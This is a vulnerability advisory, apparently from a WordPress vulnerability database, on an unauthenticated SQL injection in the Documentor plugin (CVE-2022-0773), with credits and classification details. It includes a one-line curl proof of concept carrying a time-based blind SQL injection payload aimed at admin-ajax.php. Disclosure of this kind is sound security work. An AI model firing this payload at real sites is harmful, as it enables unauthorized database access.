WordPress Plugin Vulnerabilities

Documentor <= 1.5.3 - Unauthenticated SQLi

Description

The plugin fails to sanitize and escape user input before it is being interpolated in an SQL statement and then executed, leading to an SQL Injection exploitable by unauthenticated users.

Proof of Concept

curl https://example.com/wp-admin/admin-ajax.php --data 'action=doc_search_results&term=&docid=1 AND (SELECT 6288 FROM (SELECT(SLEEP(5)))HRaz)'

Affects Plugins

Plugin icon
documentor-lite
No known fix

References

CVE
CVE-2022-0773

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
8.6 (high)

Miscellaneous

Original Researcher
cydave
Submitter
cydave
Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified
Yes
WPVDB ID
55b89de0-30ed-4f98-935e-51f069faf6fc

Timeline

Publicly Published
2022-04-05 (about 2 years ago)
Added
2022-04-05 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)

Other

Published
Title
Published
2018-11-29
Title
LoginPress <= 1.1.15 - Authenticated Blind SQL Injection
Published
2023-11-20
Title
WP Mail Log < 1.1.3 - Editor+ SQL Injection via id
Published
2003-06-02
Title
WordPress 0.7 - SQL Injection
Published
2024-01-16
Title
Burst Statistics Really Simple Plugins < 1.5.4 - Editor+ SQL Injection
Published
2023-11-07
Title
Master Slider Pro <= 3.6.5 - Authenticated (Editor+) SQL Injection